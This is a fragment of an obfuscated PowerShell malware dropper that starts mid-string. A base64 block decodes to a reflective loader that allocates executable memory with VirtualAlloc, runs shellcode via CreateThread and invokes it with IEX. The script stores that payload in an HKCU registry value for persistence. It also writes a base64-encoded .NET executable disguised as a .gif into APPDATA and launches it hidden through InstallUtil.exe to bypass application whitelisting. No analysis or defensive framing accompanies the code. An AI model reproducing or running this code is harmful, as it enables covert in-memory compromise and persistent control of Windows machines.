VbXV0gJHZhcl9wYXJhbWV0ZXJzLA0KCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMSldIFtUeXBlXSAkdmFyX3JldHVybl90eXBlID0gW1ZvaWRdDQoJKQ0KCQ0KCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1
cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2
VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5z
aUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkNCgkkdmFyX3R5cGVfYnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcignUlRTcGVjaWFsTmFtZSwgSGlkZUJ5U2lnLCBQdWJsaWMnLCBbU3lzdG
VtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsICR2YXJfcGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpDQoJJHZhcl90eXBlX2J1aWxkZXIuRGVm
aW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QnLCAkdmFyX3JldHVybl90eXBlLCAkdmFyX3BhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQ
0KCQ0KCXJldHVybiAkdmFyX3R5cGVfYnVpbGRlci5DcmVhdGVUeXBlKCkNCn0NCg0KW0J5dGVbXV0kWHpMUEhlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygia0hFQ0l2L280ZzBBQUdqamlvQ0FRd3RB
MVF0c0EwUVUwOWJYYUpLTGdJQUxXQVZiandTQ2dZQ0E2SlpaMFNqVGFHV0xnSUFMY09qTkFxNW0wMmhZaTRDQUMzam9yaGZZejlOb1M0dUFnQW5GZU9oQk9SN2swMmc5aTRDQUNjVjA2RmhMQ05iVGFDK0xnSUFKeFhEb09UN3
l1Tk5vSVl1QWdBbkZiT2l4OUR6LzAyZ1RpNENBQ2NWb0RjVVVPc1NBZ0lCb2M0cUFnRWZGRk1TQWdJRG1SOFZFaFlBTnhWalFEY1VVME9xQTZvRHFoT3FBNm9EcWdBdkZpTkRxZ0g5V0JVRDA2T3JBNklDUWdJQUx4WkRRNm9B
THhWalFmMWNMV0FWYjlNOE54WHpRQzhXUTBBdkZqTkRUQzhWWTBIL1ZlQXZGZkx2RmtQV3o2RXlDZ0lEcXdIL1ZhQXR3QlhiMG8wZUdoNENCZ05ZTHhWelFmOVYwQ1I0NGdJQ0ExZ3ZGWE5CLzFYQUx4VnpRZjlWczM5N2JDMl
hkUW95QUVOVUxiQUZFTkg1L2Y5UFcxd25OZE9ZSjFYb0p4WHpvRFQxQnYyaGNpWUNBMEdnK2lvQ0FDM0RveW8xT2lXaEtpWUNBMEdnc2lvQ0FDY1ZRNk9UREIxWm9ONG1BZ05Cb0dZcUFnQW5GVE9nWUVzR0FhSXlLZ0lEUWYx
WUxXT2k5S0paYTAyajhpb0NBQzNqb2RDWFBRdE5vNzRxQWdBbkZjT2pyaVAzRTAyamhpb0NBQ2NWczZIWXhnSC9UYU5PS2dJQUp4V2pvZFJoQTdOTm94WXFBZ0FuRlpPaWtuWmxsMDJpM2lvQ0FDY1ZnNkNhOU5ZTFRhS21LZ0
lBSnhWVG9rWVNpeStnZ0VzR0FhQmVKZ0lEUWYxYlFhSTZLZ0lBSnhWem9TaGdIYTlOb2dJcUFnQW5GV09qaW9hMm42Q2dTd1lCbzdvbUFnTkIvVnRCb1pZbUFnQXR3czF2cWdPcUE2b0RxZ09nd0VzR0FhTStKZ0lEUWYxY0xl
QVYvandUMGdZQ0E2b0RxZ09xRDZvRHFnSTgzeFhyUUM4VjgwTmQvMVhBRlFJOEUwWUdBZ09xQTZJQ0FnQVRxZ09xQTZvQUwxWFRTNm9EUWY5VnNDY1ZJQS8xSWdJOEVyWUdBZ0FQOWtJRDFrZXFBNm9EcWdPcUFDOFZJMEgvVm
FHdVI2b0RxZ09wL0M4V1EwQXZGU05CLzFXZ0ZRSThFZllDQWdPcUE2b2ZvZ0hCOS93dkZTTkIvMVZ6UWY5VllSOFZBaFlHQWdMTkFDY1U4RGNVODBBM0ZRTkFOQlRkK2YzL1E2b0VMeFVqUWY5VlVCVUNQQkQyQWdJRG9jQkxC
Z0dnRmlJQ0EwQTBGTjM1L2Y5Qi8xVXdGUUk4RklJQ0FnRWZGUUlXQmdJQ3pRQW5GUEEzRlBOQU54VURRRFFVM2ZuOS8wT3FGQzhWSTBIL1ZWQVZBOVBnTkJUZCtmMy9RZjFiWkNjVkFBZjFBZ0lEQWdQZmlBLzFBZ1BiYzZzRG
9nSkNBZ0F2RlFORHFnSC9WVUF2VmpBbUNDOFdJQzlWQUNaQUx4WXdEdUlEMHQ3TkFDY1ZFQy9XTUM3WnJpWVAxUkF2RlJLbkZRQTNGUk5BTHhVRFExZ3ZGU05CLzFXUUZRUFNHQS8xRWdQZGRBLzFBZ1BXQ000SFhmOVZnQzBQ
ZjN0c0xaZDFDaklDQWdJRDM2ZTdwN3VYMGdQWHo1Zkt6c29DQTdmUDI0L0wwZ0lETjcvcnA3T3pocjdXdXNLQ280Ky90OE9IMDZlTHM1YnVnemRQSnhhQzVyckM3b05mcDd1VHY5L09nenRTZ3RxNnd1NkRVOHVuazVlNzByN1
d1c0ttQTlPWDQ5Sy93N09IcDdydWc0K2poOHZQbDlMMzE5T2F0dUlDQWdHaC9oSUNBUXd0QTA5YlgxUU5FY0FuTXBJUUxXZ21FcE9qS2pVNkphRUtHZ0lEUWFDU0hnSUFKeEtTTUEveWtqSUNQQkEyQWdJQUx3N2dKeEtTSUM4
U2toQTNZbUF2RXBJU1BOOENVZzFnTHhLU0VqemZ3aHM0RmR2em94Z3ZFcElRTHdMU0R3NHdEKzVDQTlhb0QvS1NJZ1A3SzZzRG9nSkNBZ0F2VXBKRFMwSC9VcEp3TGVBbjdpQXZVcElnTFIyZ25ob0NBYTZjTGErckE2SUNRZ0
lBTDFaRFMwSC9VcEp3TGVBdk5rQXZWbElPVXBBdEhhTzJHZ0lBSis0Z0RRNmpPOVJrRFJKRGQzOTdiUTliWEEwUnNDZFNraEFtRXBBdUVwT1lCdU0zYWp3VUVnSUNBQzhDOEM1U2tnMElMT0NDQWdJQ0RlZ3NBSklDQWdBVkE5
dW9GZi9UbWE5a0xoNE9FcEFuRXBJZ0xUd05CaUF2M2hBTnVpRkZ1YTdhUE40RUxVT1lCWW4rUGp6ZFNDZFNra0k4M1VFRnFqQU5xZy9XV0M4U2tpSVBFcEpBSnhLU01DOFNrakF2VXBJU0JrTTREUVlJRmR2OUdDOGVFZzBjTG
VBTy9nUFNHQS8rRWdQVWNBMFNVMzk1RDA5YlgxUU5FYUFtRXBFYkVwSVNBNkEwOVFiOW8yNFdBZ05Cb3ZZYUFnQW5FcEpEb2Y1LzhTZWc0RmNHQWFDcUZnSURRZjlTa21OQm9uNGFBZ0FuRXBKUUQvS1NRZ0k4RVlZQ0FnQVA4
cEpTQWp3UldnSUNBQzRTazVnRzR6ZHFQQlVpQWdJQUx3THdMbEtTRFFnc29BSUNBZ0lOcUN3QUVnSUNBdTZ5a2p3VVFnSUNBQlVDUEJRaUFnSUJHeEtTRWdXa1hnSUNBQzhXTWc0U2swSC9VcEpRSnhLU0lBL3lraUlEMjVRUD
lnSUQwaUF2ZGdJT2NwR3VHQzkyUWc1eWtDL1dRZzdTa2E4TjNSNENBZ0FEMmxBRm5mMytBZ05jTHhLU00wSC9VcEp3SmhtdWNDNFNrZzBjSnhLU01DOFNrakFOQWd0QUx4S1NNMEgvVXBKd0poZ08rZ1BTb0EwT0VBMGFFQzdz
RmYvVTNBMFdVQS8yQWdJOEYrSDkvZndQOWtJQ1BCZTUvZjM5R3hLU0VnWTgyeEtTRUEwU1kzZC9lMjBPQWdPdmw4dTdsN0xPeXJ1VHM3SUNBZ0lEVkMyd0RSSGpUMXRlelFBbkZmT2pLalU2SmFKQ0VnSURRYUhLRWdJQUxlQV
YvandSQ2dJQ0FDOFdJQzhDOGc4V0lDY1Y0QS8xNGdJOEVMSUNBZ0F2MWVPckE2SUN3Z0lBTHh0RFFDOGEwMEg5WEMxZ0ZXL1dSNnNEb2dLQ0FnQXZHME5EcWdIOVhDMWdGVy9UOTZzRG9nSkNBZ0F2RzBORFRmMWZxd09pQWtJ
Q0FDOGJVME5OL1Z3dk8xQXZWaUF0RGFGYURnSUFMODd3TGU0TjNDZjYwQzA0TDFYZ0x4WWhvSDN4L2Z3dkd0QXZWZUt2Q3RBVkE5SWtMVUF0RGFNMTlmMzhMUTJocWZYOS9CRUQwbkF2R3FJTkhDM0RxZ09xQjEzOVdCRUQwaF
FuZGZHdUZzMEFKeFh3THhYemYzdHZaMmQxQ2hJQUxRTmJSQ0l5a0JWTDJtQXR3anphT0JFbjBpN3FNcFBTR2p6YU1wTENPd01yMWFOcmVROVVMYkFORVpOUFcxMGJGZjREbytOeTcxV2gxZ29DQTBHaFhnNENBQzFqb1VJUGNp
V2hqZ29DQTBHaEZnNENBQ2NWNDZIU1ZFekJvVUlLQWdOQm9Nb09BZ0F0dzZPWEJleWRvUG9LQWdOQm9JSU9BZ0F0NDZMSDBQUDlvTElLQWdOQm9Eb09BZ0FuRmRPZ2RudXZqYUJtQ2dJRFFhUHVEZ0lBSnhYQUZXL1dTQS8xNG
dQV01CWGIxaUFWL2p3UU5nSUNBNm9EcWdPcUQ2b0RxZ2VpQWdJQUFDOFdJMEg5VEMxZ0RlMy8wOGVxQTAzOVhDM2dGZi9iajErckFmOVYwQ2NWb0EvMW9nUFRVNm9BTnhXelExd3ZGYU5EVGY5VjRDOFZvQWJqbTV1Ym05STRM
eFdnRFFJUUJ1T2JtNXViMXJ3dkZhQU5BaUFuRlpBdFhBMnFJTWVZTHhXUm9WSDUvZnd2RlpOQm9VMzEvZnd2RmFOQi8xWEJHeFgrQjAzOVdqemJGZjkvZTJ3dGwzVUtFZ05QVzE5VUJSR1IrZjM5b1VZR0FnQXQ0NkJ3NE9pYl
hhQ3lDZ0lBTGNPZ29iWEpPMTJnZmdvQ0FDMmpvTFRiTkFkZG9Fb0tBZ0F0WTZJSVg2NVhYYUFXQ2dJQUpoS1RvM2VqSmh0ZG85NEtBZ0FuRXBJVG9qS3FPYWRkbzZJS0FnQW5FcElqb2hJR0FnQTNFcEpuUTZJd1p3WUJvVUlH
QWdOQi9WdXFBRGNTa21kQi9VK3FFRGNTa21kQi8xS1NJNktRWndZQm9MNEdBZ05BTnhLU1owSC9VcEl3TnhLU1YwSC9VcEl3TGVBM0VwSXc2aVlDQWdHajhnWUNBQTIrRnMzWXpzUWpjdkpVQS9MU01nUFdURGNTa2xkQm9mSD
EvZndSQTlJVkd4TFNNZ2VpUXA0Q0FmMVhHd3dCN3V2VlVhMDRCUkp5QmdJRGQzOTdiUTZYaDhQRGs0ZlRocGR6RzdPSHo2TkRzNGZubDhvQ0FnTnp3N1BYbnNhN2s0ZlNBZ05QVzE5VURSR3hvWElDQWdBdDRPelFid1lDRGUr
Z29iWEpPYUNHQWdJRFFhQU9CZ0lBSnhLU002RXdYa0tWb0RZQ0FnTkJvNzRHQWdBbkVwSkErakJQQmdLdGUwMmdlZ0lDQWcwYlE2R1Fad1lCb1VZQ0FnTkJvdzNWL2Z3Ty9nUFNGRGUrRWE0S3piUTNmK2d2MzZzNEZkdngxeH
RVTnhLU0UwQTNFcEl6UURjL3VEY09DanplVGFMWjJmMzhFUVBTSmY1U2s2b0IvMUtTVUEwTys2TEQxZ0lCLzFLU1F6dlZMYXowRFJKVGQzOTdiUSszejZlWDQ1ZU91NWZqbGdOVUxiTkdwUU9RTHdMQUx3SXdMMEp3THdvZ0x5
cUFMa3VZRCtZeXo5WEVKeFh3THhYelozVVBWQzJ6UmFJQ0FnSURhQVdxaEdzR0FDZFY4QzhWODJkMUREY0NBMHdWSjlveVBOcG9JbU1EQ3lRVko5M1RiUXhBRlV2YUpSb0NBd01vRlV2ZDNRd3RBMVF0c2FEaC9mMytEeFlqZF
FvU0FFTlVMYkFGRWdIeC9mOU96V3cwTmdIeC9md3RET29pQWdJQjNRSUdBZ0lEMmlWRm90YUFET0cxcmdsRm95dlZxQ1lIREEwR0VBWHVBZ1lDQTlWVURTSDhMMVlocm00ODJTVHQvZ0lDQW8xaXpTd3NNRFlCOGYzOUJhSWl6
U0F0QndvODJpZ1JKOVY1M1VOc0xaZDFDaElEVkMyd0RSR2pUMXRjTDNZaXpRQW5GZkF0RDVnRzR6ZHFQQlN1QWdJQUx3THdMVTROQ0FialF4WUNBandVWWdJQ0FDOGo0ZzBvSnpYZ0x3UHdKeFhRTHhYZ0p4V2dMeFdnTHdKUU
ZRUFQ2Qzgxb0M4bWdnMG9KelhBTGVNOEZmL0xveDdOMkMwYURRSU5BZzhWd0M0Q0RRd25GYkF2RmJOQm9rMzkvZjd2RmpQWERDOFZvQzhDa2cwTUxWb05TZzBLUE40QUwxV2dMMHB5RFU0ODNRSU5BZzBDRFVBdUNnME1KeFh3
TDFYZ0xTb1BOZEF2RmZMdEk4bys3VVBlTHMwQUp4WHhyaE1iUDlSc0x4WHpmM3RzTFpkMUNpSUFOd0lCRERjQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSU
NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJS0FnSUN2K09yWnNvQ0FnSUNBZ0lEUWdPYnM0ZlBvOE96aCtlWHlydTNwNC9MdnNM
U3dzYTdqNysyQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ05DQTVPLzM3dXp2NGVTdTdlbmo4dSt3dExDeHJ1UHY3WUR2N1lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0
lDQWdJQ0FnSUNBY0FSbWcrNEFOUUFBQUFCNENGV0I4d0FBQUFCZFpvWC9mUVpUWnJzL3BWdUg3WVgva1B4YVVwRDhXRkJhdWVJTkFBQ0FNb0NEd2dHRDZRR0QrUUIxOGxENFVrcGErVmovMEhNQ0N0djF3Z0FBIikNCg0KDQoJ
CQ0KJEJlUUFiZ3UgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dW
FsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkuSW52b2tlKFtJbnRQdHJdOjpaZXJvLCAkWHpMUEhlLkxlbmd0aCww
eDMwMDAsIDB4NDApDQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRYekxQSGUsIDAsICRCZVFBYmd1LCAkWHpMUEhlLmxlbmd0aCkNCg0KJHFYdHh3YXdNID0gW1N5c3RlbS5SdW50aW
1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoKGZ1bmNfZ2V0X3Byb2NfYWRkcmVzcyBrZXJuZWwzMi5kbGwgQ3JlYXRlVGhyZWFkKSwgKGZ1bmNfZ2V0X2RlbGVnYXRl
X3R5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtJbnRQdHJdLCBbSW50UHRyXSwgW1VJbnQzMl0sIFtJbnRQdHJdKSAoW0ludFB0cl0pKSkuSW52b2tlKFtJbnRQdHJdOjpaZXJvLDAsJEJlUUFiZ3UsW0ludFB0cl06Olplcm
8sMCxbSW50UHRyXTo6WmVybykNCltTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChmdW5jX2dldF9wcm9jX2FkZHJlc3Mga2VybmVsMzIuZGxs
IFdhaXRGb3JTaW5nbGVPYmplY3QpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbSW50MzJdKSkpLkludm9rZSgkcVh0eHdhd00sMHhmZmZmZmZmZikgfCBPdXQtTnVsbA0KJ0ANCg0KDQpJZiAoW0ludF
B0cl06OnNpemUgLWVxIDgpIHsNCglzdGFydC1qb2IgeyBwYXJhbSgkYSkgSUVYICRhIH0gLVJ1bkFzMzIgLUFyZ3VtZW50ICRTck5pbiB8IHdhaXQtam9iIHwgUmVjZWl2ZS1Kb2INCn0NCmVsc2Ugew0KCUlFWCAkU3JOaW4N
Cn0="
Set-ItemProperty -Path "HKCU:SOFTWARE\Microsoft" -Name TLtqu -Value $xghxU -force


$InstallUtilv2 = $env:WINDIR+"\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe";
$InstallUtilv4 = $env:WINDIR+"\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe";

if (Test-Path $InstallUtilv2)
{
	$Loader = $InstallUtilv2;
}else
{
	$Loader = $InstallUtilv4;
}


$zyiXOUZV = $env:APPDATA+"\kGIpG.gif";
$ogUoi=
@"
vbscript:CreateObject("Wscript.Shell").Run("$Loader /logfile= /LogToConsole=false /U $zyiXOUZV",0)(window.close)
"@
	
$fBfivE = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0
KJAAAAAAAAABQRQAATAEDACcMrVkAAAAAAAAAAOAAAgELAQgAAAoAAAAGAAAAAAAAzigAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAA
AAAAAAAAAAAAHQoAABXAAAAAEAAALACAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAA
AAC50ZXh0AAAA1AgAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAALACAAAAQAAAAAQAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAA
AAAAAAAAAAAAACwKAAAAAAAAEgAAAACAAUA1CAAAKAHAAADAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYAcgEAAHAoBAAACgAqHgIoBQAACioAABMwAQAWAAAAAQAAEQA
rDwByFwAAcAoGKAQAAAYAABcLK+0AABMwAgAxAAAAAgAAEQAoBwAACgoGKAgAAAoLB28JAAAKAAdvCgAACgwIbwsAAAoCbwwAAAoACG8NAAAKJioeAigOAAAKKgAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAb
AAAABQCAAAjfgAAgAIAANwCAAAjU3RyaW5ncwAAAABcBQAA8AAAACNVUwBMBgAAEAAAACNHVUlEAAAAXAYAAEQBAAAjQmxvYgAAAAAAAAACAAABR1UCAAkAAAAA+gEzABYAAAEAAAARAAAAAwAAAAUAAAACAAAADwAAAAQAAAA
BAAAAAgAAAAEAAAAEAAAAAAAKAAEAAAAAAAYAOAAxAAoAXAA/AAYAhABxAAYAwwCnAAYA3wCnAAYADgHuAAYALgHuAAYAVwExAA4AfwFpARIA6AHBARIABQLBARIAFQLBARIAMgLBARIASgLBAQYAkgJzAhIAnwKkAQYAvwKvA
gAAAAABAAAAAAABAAEAAQAQABkAAAAFAAEAAQABABAAIQAAAAkAAQADAFAgAAAAAJYAZgATAAEAXiAAAAAAhhhrABcAAQBoIAAAAADGAJAAGwABAIwgAAAAAJYAmgAhAAIAySAAAAAAhhhrABcAAwAAAAEAlQEAAAEAoAEhAGs
AJgAxAGsALAA5AGsAFwBBAF8BIQAJAGsAFwBJAGsAMQBRAP4BSgBZAB4CTwBhAC0CFwBhADsCVgBpAFwCWwBxAGkCYABpAKgCZQARAGsAFwCJAGsAFwAnAHsAdwAuABMAfAAuABsAhQBjADMANgAIAAYApAA8AG4ABIAAAAAAA
AAAAAAAAAAAAAAATAEAAAIAAAAAAAAAAAAAAAEAKAAAAAAAAgAAAAAAAAAAAAAACgA/AAAAAAACAAAAAAAAAAAAAAABADEAAAAAAAEAAAAAAAAAAAAAAEEApAEAAAAAAAAAPE1vZHVsZT4AcG93ZXJzaGVsbC5leGUAUHJvZ3J
hbQBTYW1wbGUAbXNjb3JsaWIAU3lzdGVtAE9iamVjdABTeXN0ZW0uQ29uZmlndXJhdGlvbi5JbnN0YWxsAEluc3RhbGxlcgBNYWluAC5jdG9yAFN5c3RlbS5Db2xsZWN0aW9ucwBJRGljdGlvbmFyeQBVbmluc3RhbGwAUnVuU
FNDb21tYW5kAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF
4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHBvd2Vyc2hlbGwAQ29uc29sZQBXcml0ZUxpbmUAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFJ1bkluc3RhbGxlckF0dHJpYnV0ZQBzYXZlZFN0Y
XRlAGNtZABTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzAFJ1bnNwYWNlQ29uZmlndXJhdGlvbgBDcmVhdGUAUnVuc3BhY2VGYWN0b3J5AFJ1bnNwYWN
lAENyZWF0ZVJ1bnNwYWNlAE9wZW4AUGlwZWxpbmUAQ3JlYXRlUGlwZWxpbmUAQ29tbWFuZENvbGxlY3Rpb24AZ2V0X0NvbW1hbmRzAEFkZFNjcmlwdABTeXN0ZW0uQ29sbGVjdGlvbnMuT2JqZWN0TW9kZWwAQ29sbGVjdGlvb
mAxAFBTT2JqZWN0AEludm9rZQBTeXN0ZW0uU2VjdXJpdHkAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAFUwAeQBRAHkAVAB2AEEATwB5AG8AAIDVaQBlAHgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwB
dADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAHAAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBA
FIARQBcAE0AaQBjAHIAbwBzAG8AZgB0ACcAKQAuAFQATAB0AHEAdQApACkAKQABAABZGBa3IpaFQpFRx0fEEYmZAAi3elxWGTTgiQiwP19/EdUKOgMAAAEDIAABBSABARINBAABAQ4FIAEBERUEIAEBCAQgAQECBQEAAQAABAc
CDgIIMb84Vq02TjUEAAASKQYAARIxEikEIAASNQQgABI5BCABAQ4IIAAVEj0BEkEIBwMSKRIxEjUEAQAAAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwGAni4BgIRTeXN0ZW0uU2VjdXJpdHkuUGVyb
Wlzc2lvbnMuU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkVAVQCEFNraXBWZXJpZml
jYXRpb24BnCgAAAAAAAAAAAAAvigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAoAAAAAAAAAAAAAAAAAAAAAAAAAABfQ29yRXhlTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAFQCAAAAAAAAAAAAAFQCNAAAAFYAUwBfAFYARQBSAFM
ASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAa
QBvAG4AAAAAAAAAsAS0AQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACQAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQB
sAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAAEAADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByA
GkAZwBoAHQAAAAgAAAASAAPAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADA
ALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0DgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
